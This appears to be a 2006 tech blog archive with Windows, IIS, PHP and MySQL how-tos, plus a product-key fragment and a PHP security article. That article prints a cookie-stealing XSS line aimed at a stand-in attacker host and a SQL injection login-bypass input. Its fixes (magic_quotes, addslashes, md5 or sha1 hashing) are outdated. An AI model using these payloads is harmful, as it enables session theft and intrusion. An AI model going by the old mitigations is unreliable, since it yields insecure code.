That’s it! Now you can now install Exchange 2000/2003 without needing to supply a CD key during the setup process!

How to change the product key on windows 2003

By: Daniel Petri

Warning!
This document contains instructions for editing the registry. If you make any error while editing the registry, you can potentially cause Windows to fail or be unable to boot, requiring you to reinstall Windows. Edit the registry at your own risk. Always back up the registry before making any changes. If you do not feel comfortable editing the registry, do not attempt these instructions. Instead, seek the help of a trained computer specialist.


Note: Microsoft recommends that you run System Restore to create a new restore point before you complete the following steps:

1) Click Start, and then click Run.

2) In the Open box, type Regedit, and then click OK.

3) In the left pane, locate and then click the following registry key:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents

4) In the right pane, right-click OOBETimer, and then click Modify.

5) Change at least one digit of this value to deactivate Windows.

6) Click Start, and then click Run.

7) In the Open box, type the following command, and then click OK.

%systemroot%\system32\oobe\msoobe.exe /a

8) Click Yes, I want to telephone a customer service representative to activate Windows, and then click Next.

9) Click Change Product key.

10) Type the new product key in the New key boxes, and then click Update. If you are returned to the previous window, click Remind me later, and then restart the computer.

11) Repeat steps 6 and 7 to verify that Windows is activated. You receive the following message:

12) Windows is already activated. Click OK to exit.

13) Click OK.

Friday, January 13, 2006

Apache hits 80 million website mark


(originally from netcraft.com)

In the October 2005 survey we received responses from 74,409,971 sites, an increase of 2.68 million sites from the September survey. The large gain makes 2005 the strongest year ever for Internet growth, as the web has added 17.5 million sites, easily surpassing the previous annual mark of 16 million during the height of the dot-com boom in 2000.

This month also saw movement in web server market share for the first time in many months, with Windows servers gaining 0.75 percent market share in active sites, while Apache's share fell by 0.67 percent. Apache continues to maintain a large lead in both active sites and hostnames, and in fact improved its share by 0.74 percent in hostnames. With this month's growth, Apache now powers more than 50 million sites.

Top Developers
DeveloperSeptember 2005PercentOctober 2005PercentChange
Apache4959842469.155200581169.890.74
Microsoft1460155320.361529303020.550.19
Sun18688912.6118899892.54-0.07
Zeus5845980.825859720.79-0.03





Active Sites
DeveloperSeptember 2005PercentOctober 2005PercentChange
Apache2251807869.912327087369.24-0.67
Microsoft731544922.71788366423.460.75
Zeus2246190.702174510.65-0.05
Sun2161650.672033490.61-0.06

PHP for the ASP developer

(originally by nathan pond)

Over 4 years ago I set out to learn how I could build a web page. Within months I had immersed myself into the world of ASP and databases. It was all so cool... I wanted to use it on my personal web site.

For starters, PHP is very well documented on the php.net web site (http://www.php.net/docs.php). One key difference I noticed was the built in functionality. As I'm sure most of you know, to do just about anything in ASP you need to create an instance of an object. This isn't the case in PHP. There are built-in functions for e-mail, file manipulation, dns lookups, images, and just about everything else you can think of. Tasks such as e-mail sending can actually be done with one line of code. But before I talk PHP up too much, it should be known that I was upset with one major weakness. Version 3 of PHP had no session support. This has been added in version 4 of PHP, but not all hosts have made the upgrade yet, so be careful to look for that if sessions are important to you. I ended up just writing my own session routines.
One thing that always came back to nip me in the butt was forgetting to end each line with a semi-colon (;). PHP is much more picky about syntax than ASP. If you are a c++ programmer, this is nothing new to you. I haven't used c++ in over a year, and had grown accustumed to creating ASP with VBScript, so it was a big change for me. (Likewise, if you have been creating ASP pages with JScript (or even better still, PerlScript), then the conversion process to PHP should proceed much more smoothly...)

Commenting - There have been numerous times when I have wanted to comment out a block of code. In ASP I had to insert and apostrophe at the beginning of each line. PHP uses the same methods as c++.

Here's an example:

<%
'this is a comment in ASP
%>

<?
//this is a comment in PHP

/*
This can also be used to comment out large chunks of text

this line is still commented

so is this....
*/
?>

Another huge difference is that in PHP all variables are used with a dollar sign ($). This is a little difficult to get used to at first. All variables must start with a $ as shown:

<?
$myVar = 0;
?>

Case sensetivity - Now before you get too scared, let me explain. Variable names are case sensitive. $MYVAR and $myvar are two separate variables. However, function names and commands are not case sensitive. Meaning that

<?
ECHO "This is a test";
?>

and <?
echo "This is a test";
?>

are the same thing.

The equals sign - In VBScript, and Visual Basic, the equals sign (=) does everything. It assigns values to variables and also checks conditions in if statements and loops. This isn't so in PHP. A single = will assign a value, just like in ASP.
<?
$myVar = "This value";
?>

However, when you are using conditionals (if statements, loops, etc..) you MUST have a double equals sign == or your script will not work. This is one of the most common mistakes. A script won't work right, and you look over you code again and again and can't see anything wrong. I have wasted up to an hour trying to debug when I made this mistake.

Kind of on a related note, inequalities are tested with != instead of <>.
Connecting Strings - Strings are concatenated in PHP by the dot ., as opposed to VBScript's ampersand &.

Connecting Strings - Strings are concatenated in PHP by the dot ., as opposed to VBScript's ampersand &.

<?
$myVar1 = "This is a test.";
$myVar2 = " And I love it!!!";

$myVar3 = $myVar1.$myVar2;

echo $myVar3; // $myVar3 contains the text:
// "This is a test. And I love it!!!"
?>

Function return values - In VBScript, to return the value of a function you simply set the function name to the value you want to return. Like this:

<%
Function myFunction()
myFunction = 1 'Return value
End Function
%>

However, in PHP you use the return command. <?
function myFunction{
return 1; //Return value
}
?>

Of course, there are many more differences, but this will get you started. If I had known these points when I was learning PHP it would have saved me a lot of late nights.

Happy programming!

Wednesday, January 11, 2006

Mysql: Client Does not support authentication protocol

Introduction

If you have ever gotten the error "Client does not support authentication protocol" when trying to use php or any other language to connect to a mysql server, there is a simple method to fix it.

Why Does this happen?

MySQL 5.0 uses an authentication protocol based on a password hashing algorithm that is incompatible with that used by older (pre-4.1) clients. If you upgrade the server from 4.1, attempts to connect to it with an older client may fail with the following message:
shell> mysql
Client does not support authentication protocol requested by server; consider upgrading MySQL client

Solution

To solve this problem, the following has been the easiest and most effective

SET PASSWORD FOR
-> 'some_user'@'some_host' = OLD_PASSWORD('newpwd');
Alternatively, use UPDATE and FLUSH PRIVILEGES: mysql> UPDATE mysql.user SET Password = OLD_PASSWORD('newpwd')
-> WHERE Host = 'some_host' AND User = 'some_user';
mysql> FLUSH PRIVILEGES;

Substitute the password you want to use for “newpwd” in the preceding examples. MySQL cannot tell you what the original password was, so you'll need to pick a new one.
Tell the server to use the older password hashing algorithm:

For each account record displayed by the query, use the Host and User values and assign a password using the OLD_PASSWORD() function and either SET PASSWORD or UPDATE, as described earlier.

Note: In older versions of PHP, the mysql extension does not support the authentication protocol in MySQL 4.1.1 and higher. This is true regardless of the PHP version being used. If you wish to use the mysql extension with MySQL 4.1 or newer, you may need to follow one of the options discussed above for configuring MySQL to work with old clients. The mysqli extension (stands for "MySQL, Improved"; added in PHP 5) is compatible with the improved password hashing employed in MySQL 4.1 and higher, and no special configuration of MySQL need be done in order to use this MySQL client library. For more information about the mysqli extension, see http://php.net/mysqli.

Top 5 PHP Security Mistakes

Introduction

Althought I am trying to concentrate on windows related open source material, the following are helpful security precations that should be taken into account when developing php web applications on any platform.

Unvalidated Input Errors

One of -- if not the -- most common PHP security flaws is the unvalidated input error. User-provided data simply cannot be trusted. You should assume every one of your Web application users is malicious, since it's certain that some of them will be. Unvalidated or improperly validated input is the root cause of many of the exploits we'll discuss later in this article.
As an example, you might write the following code to allow a user to view a calendar that displays a specified month by calling the UNIX cal command.

$month = $_GET[month];
$year = $_GET[year];

exec("cal $month $year", $result);

The proper way to correct this is to ensure that the input you receive from the user is what you expect it to be. Do not use JavaScript validation for this; such validation methods are easily worked around by an exploiter who creates their own form or disables javascript. You need to add PHP code to ensure that the month and year inputs are digits and only digits, as shown below.

$month = $_GET[month];
$year = $_GET[year];

if (!preg_match("/^[0-9]{1,2}$/", $month))
die("Bad month, please re-enter.");
if (!preg_match("/^[0-9]{4}$/", $year))
die("Bad year, please re-enter.");
exec("cal $month $year", $result);

Access Control Flaws

Another type of flaw that's not necessarily restricted to PHP applications, but is important nonetheless, is the access control type of vulnerability. This flaw rears its head when you have certain sections of your application that must be restricted to certain users, such as an administration page that allows configuration settings to be changed, or displays sensitive information.

You should check the user's credentials upon every load of a restricted page of your PHP application. If you check the user's credentials on the index page only, a malicious user could directly enter a URL to a "deeper" page, which would bypass this credential checking process.

It's also advisable to layer your security, for example, by restricting user access on the basis of the user's IP address as well as their user name, if possible. Placing your restricted pages in a separate directory that's protected by an apache .htaccess file is also good practice.

Place configuration files outside your Web-accessible directory. A configuration file can contain database passwords and other information that could be used by malicious users to penetrate or deface your site; never allow these files to be accessed by remote users. Use the PHP include function to include these files from a directory that's not Web-accessible, possibly including an .htaccess file containing "deny from any". Though this is redundant, layering security is a positive thing.

For my PHP applications, I prefer a directory structure based on the sample below. All function libraries, classes and configuration files are stored in the includes directory. Always name these include files with a .php extension, so that even if all your protection is bypassed, the Web server will parse the PHP code, and will not display it to the user. The www and admin directories are the only directories whose files can be accessed directly by a URL; the admin directory is protected by an .htaccess file that allows users entry only if they know a user name and password that's stored in the .htpasswd file in the root directory of the site.
/home /httpd /www.example.com .htpasswd /includes cart.class.php config.php /logs access_log error_log /www index.php /admin .htaccess index.php
You should set your Apache directory indexes to 'index.php', and keep an index.php file in every directory. Set it to redirect to your main page if the directory should not be browsable, such as an images directory or similar.

Never, ever, make a backup of a php file in your Web-exposed directory by adding .bak or another extension to the filename. If you do this, the PHP code in the file will not be parsed by the Web server, and may be output as source to a user who stumbles upon a URL to the backup file. If that file contained passwords or other sensitive information, that information would be readable -- it could even end up being indexed by Google if the spider stumbled upon it! Renaming files to have a .bak.php extension is safer than tacking a .bak onto the .php extension, but the best solution is to use a source code version control system like CVS. CVS can be complicated to learn, but the time you spend will pay off in many ways. The system saves every version of each file in your project, which can be invaluable when changes are made that cause problems later.

Session ID Protection

Session ID hijacking can be a problem with PHP Websites. The PHP session tracking component uses a unique ID for each user's session, but if this ID is known to another user, that person can hijack the user's session and see information that should be confidential. Session ID hijacking cannot completely be prevented; you should know the risks so you can mitigate them.

For instance, even after a user has been validated and assigned a session ID, you should revalidate that user when he or she performs any highly sensitive actions, such as resetting passwords. Never allow a session-validated user to enter a new password without also entering their old password, for example. You should also avoid displaying truly sensitive data, such as credit card numbers, to a user who has only been validated by session ID.

A user who creates a new session by logging in should be assigned a fresh session ID using the session_regenerate_id function. A hijacking user will try to set his session ID prior to login; this can be prevented if you regenerate the ID at login.
If your site is handling critical information such as credit card numbers, always use an SSL secured connection. This will help reduce session hijacking vulnerabilities since the session ID cannot be sniffed and easily hijacked.

If your site is run on a shared Web server, be aware that any session variables can easily be viewed by any other users on the same server. Mitigate this vulnerability by storing all sensitive data in a database record that's keyed to the session ID rather than as a session variable. If you must store a password in a session variable, do not store the password in clear text; use the sha1() (PHP 4.3+) or md5() function to store the hash of the password instead.

if ($_SESSION[password] == $userpass) { // do sensitive things here }

The above code is not secure, since the password is stored in plain text in a session variable.

Instead, use code more like this:
if ($_SESSION[sha1password] == sha1($userpass)) { // do sensitive things here }

The SHA-1 algorithm is not without its flaws, and further advances in computing power are making it possible to generate what are known as collisions (different strings with the same SHA-1 sum). Yet the above technique is still vastly superior to storing passwords in clear text. Use MD5 if you must -- since it's superior to a clear text-saved password -- but keep in mind that recent developments have made it possible to generate MD5 collisions in less than an hour on standard PC hardware. Ideally, one should use a function that implements SHA-256; such a function does not currently ship with PHP and must be found separately.

For further reading on hash collisions, among other security related topics, Bruce Schneier's Website is a great resource.
Cross Site Scripting (XSS) Flaws
Cross site scripting, or XSS, flaws are a subset of user validation where a malicious user embeds scripting commands -- usually JavaScript -- in data that is displayed and therefore executed by another user.

For example, if your application included a forum in which people could post messages to be read by other users, a malicious user could embed a script tag, shown below, which would reload the page to a site controlled by them, pass your cookie and session information as GET variables to their page, then reload your page as though nothing had happened. The malicious user could thereby collect other users' cookie and session information, and use this data in a session hijacking or other attack on your site.

document.location = 'http://www.badguys.com/cgi-bin/cookie.php?' + document.cookie;
To prevent this type of attack, you must perform user input validation by disallowing any script tags from being submitted to your forms. Always convert the <> characters in user input that may be viewed by other users to < and >. Additionally, it may be wise to convert the parenthesis, ampersand, and hash (#) characters to their HTML entity equivalents.

SQL Insertion Vulnerabilities

SQL insertion vulnerabilities are yet another class of input validation flaws. Specifically, they allow for the exploitation of a database query. For example, in your PHP script, you might ask the user for a user ID and password, then check for the user by passing the database a query and checking the result.

SELECT * FROM users WHERE name='$username' AND pass='$password';
However, if the user who's logging in is devious, he may enter the following as his password:
' OR '1'='1

This results in the query being sent to the database as:
SELECT * FROM users WHERE name='known_user' AND pass='' OR '1'='1';
This will return the username without validating the password -- the malicious user has gained entry to your application as a user of his choice. To alleviate this problem, ensure that your magic_quotes_gpc PHP ini variable is turned on, which is the default in most recently released versions of PHP. If you're developing software that may be installed on shared servers where the end user might not be able to change the php.ini file, use code to check that status of magic_quotes_gpc and, if it is turned off, pass any user input that will be used in a database query through the addslashes() function, as shown below.
if (magic_quotes_gpc()){
$username = $_GET["username"];
} else {
$username = addslashes($_GET["username"]); }

Do not use addslashes() on your input if magic_quotes_gpc is on, as this will double escape your input and lead to problems.
SQL Insertion flaws do not always lead to privilege escalation. For instance, they can allow a malicious user to output selected database records if the result of the query is printed to your HTML output.

You should always check user-provided data that will be used in a query for the characters '",;() and, possibly, for the keywords "FROM", "LIKE", and "WHERE" in a case-insensitive fashion. These are the characters and keywords that are useful in a SQL insertion attack, so if you strip them from user inputs in which they're unnecessary, you'll have much less to worry about from this type of flaw.

Error Reporting

You should ensure that your display_errors php.ini value is set to "0". Otherwise, any errors that are encountered in your code, such as database connection errors, will be output to the end user's browser. A malicious user could leverage this flaw to gain information about the internal workings of your application, simply by providing bad input and reading the error messages that result.

The display_errors value can be set at runtime using the ini_set function, but this is not as desirable as setting it in the ini file, since a fatal compilation error of your script will still be displayed: if the script has a fatal error and cannot run, the ini_set function is not run.

Instead of displaying errors, set the error_log ini variable to "1" and check your PHP error log frequently for caught errors. Alternatively, you can develop your own error handling functions that are automatically invoked when PHP encounters an error, and can email you or execute other PHP code of your choice. This is a wise precaution to take, as you will be notified of an error and have it fixed possibly before malicious users even know the problem exists. Read the PHP manual pages on error handling and learn about the set_error_handler() function.

Tuesday, January 10, 2006

mysql or microsoft sql?

(originally from mssqlcity.com)

Introduction

Often people in newsgroups ask about some comparison of Microsoft SQL Server and MySQL. In this article, I compare SQL Server 2000 with MySQL version 4.1 regarding price, performance, platforms supported, SQL dialects and products limits.

Platform comparison

SQL Server 2000 only works on Windows-based platforms, including Windows 9x, Windows NT, Windows 2000 and Windows CE.In comparison with SQL Server 2000, MySQL version 4.1 supports all known platforms, including Windows-based platforms, AIX-based systems, HP-UX systems, Linux Intel, Sun Solaris and so on.

Hardware requirements

To install SQL Server 2000, you should have the Intel or compatible platforms and the following hardware:

Processor: Pentium 166 MHz or higher
Memory: 32 MB RAM (minimum for Desktop Engine),64 MB RAM (minimum for all other editions),128 MB RAM or more recommended
Hard disk space:

270 MB (full installation),250 MB (typical),95 MB (minimum),Desktop Engine: 44 MB
Analysis Services: 50 MB minimum and 130 MB typical
English Query: 80 MB MySQL version 4.1 is not so powerful as SQL Server 2000 and uses less hardware resources.

To install MySQL version 4.1, you should have near 32 Mb RAM and near 60 Mb hard disk space. The general MySQL version 4.1 installation does not require additional CPU resources.

Software requirements: SQL Server 2000 comes in six editions: Enterprise, Standard, Personal, Developer, Desktop Engine, and SQL Server CE (a compatible version for Windows CE)

MySQL version 4.1 comes in two editions:

The Standard edition are recommended for most users and contains general MySQL features. The Max edition includes additional features such as the Berkeley DB storage engine, OpenSSL support, user-defined functions (UDFs), and BIG_TABLE support.MySQL version 4.1 requires the following software:

Platform
Operating System Version
Windows-based
Windows 95/98/NT/2000/XP/2003
Sun Solaris
Solaris 8 (SPARC)
FreeBSD
FreeBSD 4.x (x86)
Mac OS X
Mac OS X v10.2
HP-UX
HP-UX 10.20 (RISC 1.0),HP-UX 11.11 (PA-RISC 1.1 and 2.0),HP-UX 11.11 (PA-RISC 2.0, 64-bit only)
AIX-Based
AIX 5.1 (RS6000),AIX 4.3.2 (RS6000),AIX 4.3.3 (RS6000)
QNX
QNX 6.2.1 (x86)
SGI Irix
SGI Irix 6.5
Dec OSF
Dec OSF 5.1 (Alpha)

Performance comparison

It is very difficult to make the performance comparison between SQL Server 2000 and MySQL version 4.1. The performance of your databases depends rather from the experience of the database developers and database administrator than from the database's provider. You can use both of these RDBMS to build stable and efficient system. However, it is possible to define the typical transactions, which used in inventory control systems, airline reservation systems and banking systems. After defining these typical transactions, it is possible to run them under the different database management systems working on the different hardware and software platforms.

TPC tests The Transaction Processing Performance Council (TPC.Org) is independent organization that specifies the typical transactions (transactions used in inventory control systems, airline reservation systems and banking systems) and some general rules these transactions should satisfy.The TPC produces benchmarks that measure transaction processing and database performance in terms of how many transactions a given system and database can perform per unit of time, e.g., transactions per second or transactions per minute.The TPC organization made the specification for many tests. There are TPC-C, TPC-H, TPC-R, TPC-W and some old tests, such as TPC-A, TPC-B and TPC-D. The most popular test is the TPC-C test (OLTP test).At the moment the article was wrote, SQL Server 2000 held the second position in the TPC-C by performance results. See Top Ten TPC-C by Performance Version 5 Results At the moment the article was wrote, SQL Server 2000 held the top TPC-C by price/performance results.See Top Ten TPC-C by Price/Performance Version 5 Results MySQL does not participate in TPC-C tests, they make their own benchmark tests. These tests are not independent, but if you interesting, see this link:The MySQL Benchmark Suite

Features comparison

Both SQL Server 2000 and MySQL version 4.1 support the ANSI SQL-92 entry level and do not support the ANSI SQL-92 intermediate level. In the Features comparison section of this article, I want to make the brief comparison of the Transact-SQL with MySQL dialect and show some SQL Server 2000 and MySQL version 4.1 limits.

T-SQL vs MySQL dialectThe dialect of SQL supported by Microsoft SQL Server 2000 is called Transact-SQL (T-SQL). The dialect of SQL supported by MySQL version 4.1 is called MySQL dialect. Transact-SQL dialect is more powerful language than MySQL dialect.

Conclusion

It is not true that SQL Server 2000 is better than MySQL version 4.1 or vice versa. Both products can be used to build stable and efficient system and the stability and effectiveness of your applications and databases depend rather from the experience of the database developers and database administrator than from the database's provider. But SQL Server 2000 has some advantages in comparison with MySQL version 4.1 and vice versa.

The SQL Server 2000 advantages:

SQL Server 2000 holds the top TPC-C performance and price/performance results.
SQL Server 2000 is generally accepted as easier to install, use and manage.
Transact-SQL is more powerful language than MySQL dialect.

The MySQL version 4.1 advantages:

MySQL version 4.1 supports all known platforms, not only the Windows-based platforms.
MySQL version 4.1 requires less hardware resources.
You can use MySQL version 4.1 without any payment under the terms of the GNU General Public License. This is from MySQL version 4.1 documentation:MySQL Server was designed from the start to work with medium size databases (10-100 million rows, or about 100 MB per table) on small computer systems.

Monday, January 09, 2006

MySQL and FirebirdSQL Top Open Source DB List

(originally from internetnews.com)

A report from Evans Data shows that FirebirdSQL and MySQL are the most popular open source databases currently in use.

The findings are part of Evans Data's Database Development Survey of more than 400 developers. According to the survey, 52.9 percent said they are using MySQL and 51.6 percent said they were using FirebirdSQL.

PostgreSQL came in third at 14.8 percent, and Sleepycat's Berkely DB (4.1 percent), GNU SQL (3.3 percent) and SAP DB (1.2 percent) rounded out the list.
The Firebird name became the subject of heated dispute in the open source community in 2003 when the Mozilla project re-named its next-generation browser Phoenix to Firebird. After bowing to pressure from the community and the FirebirdSQL project, Mozilla changed the name to Firefox last year.

According to Evans Data's research, MySQL and FirebirdSQL are each fulfilling different niches.
"Firebird has a very strong position in what we define as edge databases that could be embedded databases -- databases sitting at the periphery of the enterprise," Evans Data analyst Joe McKendrick told internetnews.com. "MySQL had a stronger showing on the enterprise level."

The distant third place showing by PostgreSQL in the Evans Data survey is likely related to its previous lack of proper Windows support, according to McKendrick. PostgreSQL version 8.0 of its database, which now includes native Windows support.
"In our survey, 90 percent of our developers work with or deployed to Windows platforms," McKendrick explained. "Windows dominates this space, and a database that doesn't run on Windows or doesn't run effectively in Windows would have a fairly limited reach."

Among the other findings of the Evans Data study is that data restoration capabilities have climbed over the past year. In 2003, 41 percent of respondents reported they could restore mission critical data within an hour. That number jumped to 62 percent in 2004.
Security also seems to a strong point for database administrators in 2004. Eighty-nine percent of respondents reported they had no database security breaches.

Software's Top 10 2005 Trends: #2 Open Source

Article originally from Burnam's beat (3/16/2005)

Open Source is one of the most important and perhaps the most controversial trends within the software industry. While some see Open Source as a kind of communal catalyst for innovation and creativity others see it as a wildly destructive trend that threatens to undermine the economic viability of the entire software industry.

To date, Open Source projects have largely been focused on broad horizontal platforms within infrastructure software. These projects have been so numerous and so successful that many pundits now talk about building applications on top of the all-Open Source LAMP (Linux, Apache, MySQL, Php/Python/Perl) stack. And that stack continues to get bigger as Open Source projects start migrating to more complex infrastructure platforms, such as applications servers (J-Boss, Zope, JonAs, Enhydra). In fact, there are Open Source projects currently underway for just about every major infrastructure software technology you can think of from Content management, to BPEL, to you name it.

One of the biggest questions facing the software industry in 2005 is whether or not Open Source will “jump the species barrier” and start to become a major factor in the enterprise applications space. A quick look at Sourceforge confirms that to date most Open Source efforts in the applications space have been confined to niche applications in the academic space, but there are now numerous efforts underway, such as SugarCRM, to try and create enterprise-ready Open Source applications. Whether these applications efforts are successful or not is one of the key issues keeping software company executives up at night.

For software executives, Open Source presents three major choices: beat it, join-it, or co-opt it. The conventional wisdom suggests that the way to beat Open Source is to “out-engineer” Open Source by providing a more stable, secure and feature rich product while at the same time “out-servicing” Open Source by providing robust 24/7 support. This strategy appears to be keeping many Global 2000 customers “in the fold” for now, but even at these customers Open Source software is increasingly showing up in non-mission critical areas.

Joining Open Source is an option many companies, especially many small infrastructure software companies, increasingly appear to be taking. These companies typically develop their software in-house and then once finished (or almost finished) declare to their software to be “Open Source”. The strategy is essentially to use “free Open Source software” as a way to acquire customers that can then be charged services and maintenance fees. This strategy sounds great but has several drawbacks, chief of which is that simply declaring a software product to be Open Source does not automatically create a large community of diverse programmers who are willing to devote substantial free time to improving the product, but it definitely does make the company’s IP public domain. Thus, many of these companies face the prospect of getting little or no development leverage from Open Source in return for giving up the copyright to all of their code.

Attempting to co-opt Open Source is probably the most popular and most complicated approach to dealing with the issue. IBM is the poster child of Open Source co-opting. IBM primarily sees Open Source as a way to commodify the main revenue sources of its key competitors. IBM’s bear hug of Linux was largely part of a (arguably wildly successful) strategy to undermine the value of Solaris and Windows NT and thereby stall their push into the glass house. But IBM’s love of OpenSource only goes so far. You don’t see them pushing J-Boss at the expense of Websphere or MySQL at the expense of DB2. Indeed IBM continues to lay out big bucks for “proprietary” software, so their love of Open Source appears to only go as far as they can co-opt it. Taking IBM’s lead, most of the other major software vendors (save Microsoft) now appear to be selectively co-opting Open Source to use as a weapon against their competitors.
For software VCs, Open Source creates a number of tricky investment problems. If one continues to invest in proprietary software, you run the risk of getting “Open Sourced” if the space becomes attractive enough to create either a developer community groundswell or interest from an elephant like IBM. If one invests in Open Source, you run the risk competing with 5 other companies selling the same product and turning software margins into services margins.

However, there is some middle ground. For example, companies that offer software as a service are somewhat protected from Open Source pressures as customers are buying the whole service not just the code. Indeed companies that offer software as a service can leverage a lot of Open Source software to lower their own costs. In addition, while Open Source projects may make some headway into a few large horizontal applications, chances are that it will be very difficult for them to penetrate specialized vertical niches because there just aren’t a lot of developers out there that understand the business logic required for those niches, thus making it much harder for an Open Source project to attain critical mass.

Ultimately the biggest issue for VCs is whether or not Open Source has effectively “capped” the home-run potential of software deals by guaranteeing that any new horizontal software platform that achieves critical mass will inevitably face intense competition from a free, Open Source equivalent.

Personally, I’d like to think that the answer to that issue is “no”, but I also believe that creating a next-generation “home run” platform company is now a whole harder thanks to Open Source.

Sunday, January 08, 2006

How to install php 4.4.1 on iis 6.0

Although this is not as common as installing it on a *nx machine (since I personally use freebsd and linux, im not going to play favorites), there are still a great deal of people out there that for one reason or another, would like to php scripts on a windows 2003 box (the company I worked for would not allow us to run anything but windows machines).

Steps for installing php 4.4.1 on a windows 2003 machine

note: These instructions are for iis 6.0

Step 1: Download php 4.4.1 (get the binary package, not the installer)
Step 2: Extract the .zip file you just downloaded (I usually extract it to the c drive and rename it php, but the name can be anything).
Step 3: Launch the iis (internet information services) manager
Step 4: Click on "web service Extensions" on the left and right-click on the right and pane and go to "add a new web service extension". There should now be a new window on the screen. for "extention name" use ".php". Click the add button on the right, and point it to c:\(the php directory from step 2)\sapi\php4isapi.dll. After this is done, check the box that says "set extension status to allowed" and click ok.
Step 5:

a) right-click "web sites" and go to properties.
b) click on the tab "home directory"
c) where it says "execute persmissions" it should state: "scripts and executables"
d) click the "configuration..." button
e) click the "add..." button
f) for executable, use the same one from step 4 (php4isapi.dll).
The extensions should be .php.

Step 6: copy php.ini to c:\windows and php4ts.dll,php4ts.lib to c:\windows\system32

Testing your new installation:

I usually create a file called "info.php" with the following:

If everything has been installed properly, when you go to "info.php", you should see an information page about php 4.4.1

Saturday, January 07, 2006

Successfully Backing up and Restoring IIS 6.0

There comes a time in every system administrator's life when they must face a harsh reality. Your company's webserver has had a major harddrive failure and it needs to be running again as quickly as possible because in the business world, time=money.

After personally going through the above scenario a dozen times, I scoured the Internet to
find the best solution for backing up and restoring all of my company's websites. Microsoft provides a few solutions within their knowlege base, but most require you to restore it on the exact system (hardware) where it was backed up.

I came up with a solution that is fairly simple to execute and is hardware independent.

Disclaimer: I have tried the following and it has worked successfully for me, but use it at your own risk. I am not responsible for any damage you may cause from following this procedure.

Steps for backing up (These steps will be done on the original server)

Step 1: Download and Install the iis 6.0 resource kit (link here)
Step 2: We are first going to backup the metabase files for your server. This is a sort of internal registry designed specifically for IIS.
A) Launch the program called "Metabase Explorer" that came with the resource kit
B) Two items can be seen on the left-hand pane. "Lm" and "Schema". Both of these need to be saved. To do this, right-click on each one individually and then go to "export to file". To make it easier for restoring, I prefer to use the exact names of each key: "Lm.mbk" and "Schema.mbk". If you don't use this naming convention, just remember the file that is associated with the proper key.
C) Now, the actual websites can be backed up. There is nothing special that needs to be done here. The entire website directory just needs to be copied to your desired location. Also worth noting: remember the exact path of your websites directory. IE: "C:\websites" or "c:\wwwroot". You will need this when restoring.

Steps for Restoring (These steps will be done on the new/target server)

Step 1: Copy all website files from the backup to the exact filepath as the original server (from step 2 part c from above)
Step 2: install the iis 6.0 resource kit
Step 3: launch the metabase explorer
Step 4: left-click on "LM" on the left-hand pane and go to metabase->import key. Then point it to the LM key file that has been backed up.
Step 5: Follow step 4 for "schema".
Step 6: This step is important, because without it, your websites will be inaccessible. If this step is forgotton, you will see a username/password authentication box whenever someone tries to visit any of your websites.
A) Open up the IIS manager
B) In the left-hand pane, right-click websites and go to properties.
C) Go to the tab that says "directory security"and under "authentication and access control" click on "edit".
D) The restore process clears these settings, so make sure "enable anonymous access" is checked and an username/password is set. It will not allow a blank password, so a password will need to be set for the anonymous user account on the system username: IUSER_*MACHINE NAME*. This can be done through the administrative user control panel.

You should now have an exact copy of your websites.